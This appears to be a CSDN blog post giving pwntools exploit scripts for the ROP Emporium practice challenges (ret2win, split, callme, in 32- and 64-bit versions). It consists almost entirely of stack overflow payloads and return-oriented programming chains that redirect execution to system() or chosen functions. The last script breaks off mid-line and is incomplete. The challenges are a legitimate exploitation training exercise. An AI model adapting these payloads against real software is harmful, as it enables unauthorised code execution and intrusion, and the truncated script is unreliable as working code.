1)ret2win32
from pwn import *
catflag = 0x0804862C
p = process('./ret2win32')
payload = 'A'*0x28 + p32(0) + p32(catflag)
p.recvuntil('> ')
p.send(payload)
p.interactive()
2)ret2win
from pwn import *
catflag = 0x0000000000400756
p = process('./ret2win')
elf = ELF('./ret2win')
#gdb.attach(p, "b* 0x00000000004006E8")
payload = 'A'*0x20 + p64(0) + p64(catflag)
p.recvuntil('> ')
p.send(payload)
p.interactive()
3) split32
from pwn import *
pltsystem = 0x080483E0
usefulString = 0x0804A030
p = process('./split32')
payload = 'A'*0x28 + p32(0) + p32(pltsystem) + p32(0) + p32(usefulString)
p.recvuntil('> ')
p.send(payload)
p.interactive()
4) split
from pwn import *
pltsystem = 0x0000000000400560
usefulString = 0x0000000000601060
poprdiret = 0x00000000004007c3
p = process('./split')
payload = 'A'*0x20 + p64(0) + p64(poprdiret) + p64(usefulString) + p64(pltsystem)
p.recvuntil('> ')
p.send(payload)
p.interactive()
5)callme32
from pwn import *
usefulString = 0x0804874F
param1 = 0xDEADBEEF
param2 = 0xCAFEBABE
param3 = 0xD00DF00D
plt_callme_one = 0x080484F0
plt_callme_two = 0x08048550
plt_callme_three = 0x080484E0
pop_esi_edi_ebp_ret = 0x080487f9
pop_ebx_esi_edi_ebp_ret = 0x080487f8
p = process('./callme32')
gdb.attach(p,"b *main")
#payload = 'A'*0x28 + p32(0) + p32(plt_callme_one) + p32(0) + p32(param1) + p32(param2) + p32(param3) + p32(plt_callme_two) + p32(0) + p32(param1) + p32(param2) + p32(param3)+ p32(0) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)
payload = 'A'*0x28 + p32(0) + p32(plt_callme_one) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3) + p32(plt_callme_two) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)+ p32(plt_callme_three) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)
p.recvuntil('> ')
p.send(payload)
p.interactive()
6)callme
from pwn import *
usefulString = 0x0804874F
param1 = 0xDEADBEEFDEADBEEF
param2 = 0xCAFEBABECAFEBABE
param3 = 0xD00DF00DD00DF00D
plt_callme_one = 0x0000000000400720
plt_callme_two = 0x0000000000400740
plt_callme_three = 0x00000000004006F0
pop_rdi_rsi_pop_ret = 0x000000000040093c
p = process('./callme')
#gdb.attach(p,"b *main")
payload = 'A'*0x20 + p64(0) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64(param2) + p64(param3) + p64(plt_callme_one) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64(param2) + p64(param3) + p64(plt_callme_two) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64
ropemporium新通关脚本
最新推荐文章于 2021-06-27 23:11:36 发布
![](https://img-home.csdnimg.cn/images/20240709112858.png)